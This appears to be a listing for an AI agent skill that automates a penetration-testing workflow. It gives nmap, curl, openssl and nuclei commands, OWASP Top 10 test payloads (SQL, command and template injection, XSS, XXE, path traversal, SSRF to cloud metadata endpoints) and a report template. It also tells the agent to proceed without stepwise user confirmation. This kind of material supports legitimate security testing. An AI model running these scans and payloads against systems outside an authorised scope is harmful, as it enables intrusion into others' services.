Install
openclaw skills install @liuyang7792/pentest-autoopenclaw skills install @liuyang7792/pentest-auto收到渗透测试任务后,按以下全流程自动推进,无需用户分步追问。
开启新任务时,仅确认以下2项,缺少任意一项不开展:
默认项(不再询问):
/home/kali/ceshi/并行执行,节省时间:
nmap -sS -sV -O -T3 -p- --min-rate 500 --open <target>(多目标同时扫)nmap -sT -Pn -T2 -p 80,443,8080,8443,3306,21,25,3389,5432,6379,27017,9200,5601 --open <target>nmap -sU -Pn -T2 -p 53,69,111,123,137,161,500 --open <target>nc -v <target> 22(若22开放)curl -skv https://<target>/(若443开放)echo | openssl s_client -connect <target>:443 -showcerts 2>/dev/null | openssl x509 -noout -textecho | openssl s_client -connect <target>:443 2>/dev/null | openssl x509 -noout -ext subjectAltNamewhatweb -a 3 https://<target>/(若HTTP/HTTPS开放)执行顺序:先跑通用扫描项 → 再按OWASP Top 10逐类检测 → 最后根据组件版本匹配CVE清单。
nmap -sT -Pn -sV -sC -p <port> <target> + --script ssl-cert,ssl-enum-ciphers(HTTPS)dirb https://<target>/ /usr/share/dirb/wordlists/common.txt/v2/, /v2/_catalog, /v2/_catalog?n=10curl -sk -I -H "Origin: https://evil.example.com" https://<target>/参照 references/owasp-top10-checklist.md 获取完整POC。 每类必测项如下:
A01 失效的访问控制 (Broken Access Control)
../../../etc/passwd、..%2f编码变体A02 加密失败 (Cryptographic Failures)
A03 注入 (Injection)
' AND 1=1--/' AND 1=2--)、时间型('; WAITFOR DELAY '0:0:5'--/' AND SLEEP(5)--)、报错型(')、联合查询(' UNION SELECT NULL--); id、| id、$(whoami)、`id`{{7*7}}、${7*7}、<%= 7*7 %><script>alert(1)</script>)、存储型、DOM型、过滤绕过(<svg/onload=alert(1)>)<!ENTITY xxe SYSTEM "file:///etc/passwd">%0d%0aSet-Cookie:evil=1{"$gt":""}、{"$ne":null}*)(uid=*${Runtime.getRuntime().exec("id")}A04 不安全设计 (Insecure Design)
A05 安全配置错误 (Security Misconfiguration)
A06 脆弱过时组件 (Vulnerable and Outdated Components)
references/cve-checklist.md 匹配已知CVEnuclei -u <target> -severity medium,high,critical -rate-limit 5A07 认证失败 (Identification and Authentication Failures)
?redirect=https://evil.comA08 软件和数据完整性故障 (Software and Data Integrity Failures)
A09 安全日志和监控失败 (Security Logging and Monitoring Failures)
A10 服务端请求伪造 (SSRF)
http://127.0.0.1http://127.0.0.1:端口169.254.169.254/latest/meta-data/)、阿里云(100.100.100.200)、GCP(metadata.google.internal)file:///etc/passwd、gopher://、dict://根据第1步识别到的组件版本,对照 references/cve-checklist.md:
针对第2步发现的风险点:
输出标准化渗透测试报告,结构如下:
1. 测试概述(授权范围、测试时间、测试类型)
2. 资产清单(IP、端口、服务、版本、SSL证书信息)
3. 风险总览(分级统计表)
4. 单个漏洞详情:
- 漏洞编号
- 风险等级
- 目标
- 漏洞原理
- 复现步骤(可直接运行的命令)
- 复现结果
- 危害说明
- 修复建议
5. OWASP Top 10覆盖矩阵
6. 统一修复建议(代码/配置层、服务器配置、WAF策略、权限管控、运维规范)
7. 安全长效加固方案
8. 附录:测试命令记录、CVE匹配清单、测试覆盖矩阵
/root/.openclaw/workspace/pandoc "<报告路径>.md" -o "/home/kali/ceshi/<报告名>.docx"
bash skills/pentest-auto/scripts/convert_report.sh <报告.md> /home/kali/ceshi/渗透测试报告_<目标IP或域名>.md / .docx
多目标用下划线连接:渗透测试报告_10.3.144.57_58.docx
references/owasp-top10-checklist.md — OWASP Top 10完整检测项与POCreferences/cve-checklist.md — 高危CVE参考清单(2024-2026),按组件分类scripts/convert_report.sh — 报告MD转DOCX脚本